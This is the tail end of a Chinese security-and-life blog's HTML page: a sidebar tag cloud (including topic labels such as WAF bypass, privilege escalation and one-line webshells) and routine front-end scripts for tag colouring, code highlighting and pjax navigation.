                      <li><a href="/tags/批处理/" class="tag-could" data-toggle="tooltip" data-placement="top" title="批处理">批处理</a></li>
                    
                      <li><a href="/tags/k先生/" class="tag-could" data-toggle="tooltip" data-placement="top" title="k先生">k先生</a></li>
                    
                      <li><a href="/tags/吐槽/" class="tag-could" data-toggle="tooltip" data-placement="top" title="吐槽">吐槽</a></li>
                    
                      <li><a href="/tags/mysql/" class="tag-could" data-toggle="tooltip" data-placement="top" title="mysql">mysql</a></li>
                    
                      <li><a href="/tags/cmd命令/" class="tag-could" data-toggle="tooltip" data-placement="top" title="cmd命令">cmd命令</a></li>
                    
                      <li><a href="/tags/基础知识/" class="tag-could" data-toggle="tooltip" data-placement="top" title="基础知识">基础知识</a></li>
                    
                      <li><a href="/tags/打击钓鱼网站/" class="tag-could" data-toggle="tooltip" data-placement="top" title="打击钓鱼网站">打击钓鱼网站</a></li>
                    
                      <li><a href="/tags/中华人民共和国网络安全法/" class="tag-could" data-toggle="tooltip" data-placement="top" title="中华人民共和国网络安全法">中华人民共和国网络安全法</a></li>
                    
                      <li><a href="/tags/过waf/" class="tag-could" data-toggle="tooltip" data-placement="top" title="过waf">过waf</a></li>
                    
                      <li><a href="/tags/生活/" class="tag-could" data-toggle="tooltip" data-placement="top" title="生活">生活</a></li>
                    
                      <li><a href="/tags/过狗/" class="tag-could" data-toggle="tooltip" data-placement="top" title="过狗">过狗</a></li>
                    
                      <li><a href="/tags/提权/" class="tag-could" data-toggle="tooltip" data-placement="top" title="提权">提权</a></li>
                    
                      <li><a href="/tags/运维应急/" class="tag-could" data-toggle="tooltip" data-placement="top" title="运维应急">运维应急</a></li>
                    
                      <li><a href="/tags/一句话/" class="tag-could" data-toggle="tooltip" data-placement="top" title="一句话">一句话</a></li>
                    
                      <li><a href="/tags/读文学/" class="tag-could" data-toggle="tooltip" data-placement="top" title="读文学">读文学</a></li>
                    
                      <li><a href="/tags/自己的反思/" class="tag-could" data-toggle="tooltip" data-placement="top" title="自己的反思">自己的反思</a></li>
                    
                      <li><a href="/tags/信贷行业/" class="tag-could" data-toggle="tooltip" data-placement="top" title="信贷行业">信贷行业</a></li>
                    
                      <li><a href="/tags/端口知识/" class="tag-could" data-toggle="tooltip" data-placement="top" title="端口知识">端口知识</a></li>
                    
                  
                </ul>
            </div>
            <script>
              // 博客侧栏标签云随机色
              var tag_cloud = $('.tag-could');
              tag_cloud.each(function () {
                  var Cnum = 9;
                  var Crand = parseInt(Math.random() * Cnum);
                  $(this).addClass("tag-could" + Crand);
              })
            </script>
            <!--返回顶部按钮-->
            <div class="retop">
                <i class="fa fa-angle-up"></i>
            </div>
        </div><!--博客侧边栏结束-->
    </div>
</div>
<script src="/js/LeanStatistics.min.js"></script>
<script src="/js/Life.js"></script>
<script type="text/javascript">
    hljs.initHighlightingOnLoad();
    hljs.initLineNumbersOnLoad();
    otherF();
    LeanStatistics();
    $(document).pjax('a', '#pjax-box', {fragment:'#pjax-box', timeout:8000}).on('pjax:complete', function() {
      $('pre code').each(function(i, block){
        hljs.highlightBlock(block);
      })
      $('code.hljs').each(function(i, block) {
        hljs.lineNumbersBlock(block);
      });
      LeanStatistics();
    }).on('pjax:start', function() { NProgress.start(); }).on('pjax:end',   function() {
      NProgress.done();
      otherF();
    });
</script>
</body>
</html>
